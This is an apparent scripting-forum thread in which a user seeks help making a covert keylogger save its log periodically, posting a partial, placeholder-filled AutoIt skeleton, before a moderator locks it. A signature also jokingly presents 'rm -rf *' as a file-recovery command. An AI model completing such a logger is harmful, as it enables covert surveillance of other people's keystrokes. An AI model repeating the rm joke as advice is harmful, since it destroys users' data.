need some help again.

ok. i know this isn`t allowed in here, so i won`t type that word because we don`t want people find it on google.

i made a script that r ecords what the user types. but i only have one problem. the output file won't save itself until the script closes. so if he restarts or shutdowns the computer, then it won`t be any log in the file. i need a way to save the file from 5 to 5 minutes or something like that. here is a not full version of my script.

#include <Misc.au3>

Opt("SendKeyDelay", 5)

$b = True

If $b = True Then FileInstall("C:\klog.txt", @WorkingDir)

$dll = DllOpen("user32.dll")

$file = FileOpen("klog.txt", 1)

While 1

If _IsPressed("something", $dll) Then

FileWrite($file, blah blah)

-Some more code-

WEnd

I hope it wasn`t too explicit and if it was, then please delete my post.

i just need some tips. thanks.

like what? ban?

prison!

__________________________________________________________(l)user: Hey admin slave, how can I recover my deleted files?admin: No problem, there is a nice tool. It's called rm, like recovery method. Make sure to call it with the "recover fast" option like this: rm -rf *

What a stupid way to ask a question. You clearly stated you know keylogger questions aren't allowed. Your question isn't even about keyloggers, it's about file buffering. Did it not occur to you to eliminate the keylogger aspect of the question so you would actually get an answer? Ridiculous. Thread locked.